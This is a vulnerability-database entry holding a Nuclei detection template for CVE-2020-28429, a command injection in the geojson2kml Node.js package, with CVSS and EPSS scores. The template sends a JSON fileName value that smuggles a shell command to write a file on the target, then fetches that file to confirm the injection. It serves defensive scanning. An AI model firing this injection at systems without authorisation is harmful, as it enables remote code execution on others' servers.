Lucene search

ProjectDiscoveryNUCLEI:CVE-2020-28429

HistoryAug 07, 2024 - 3:28 p.m.

geojson2kml - Command Injection

2024-08-0715:28:31

ProjectDiscovery

github.com

command injection

vulnerability

unauthorized access

remote code execution

privilege escalation

geojson2kml

file upload

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.3

Confidence

Low

EPSS

0.968

Percentile

99.7%

JSON

Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.

id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.01897
    epss-percentile: 0.8876
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5f3443f57ce4a21a84b28f2d09ba7fbe29f0383c89fb75f2b73e9a44dc1178e02204406e9738eacd9e9e354c6fc11dc4df96cd2a23c9eaa4c359d8d2b5b2cba1c7f:922c64590222798bb761d5b6d8e72950

References

github.com/advisories/GHSA-w83x-fp72-p9qc

nvd.nist.gov/vuln/detail/CVE-2020-28429

snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.3

Confidence

Low

EPSS

0.968

Percentile

99.7%

JSON

Related for NUCLEI:CVE-2020-28429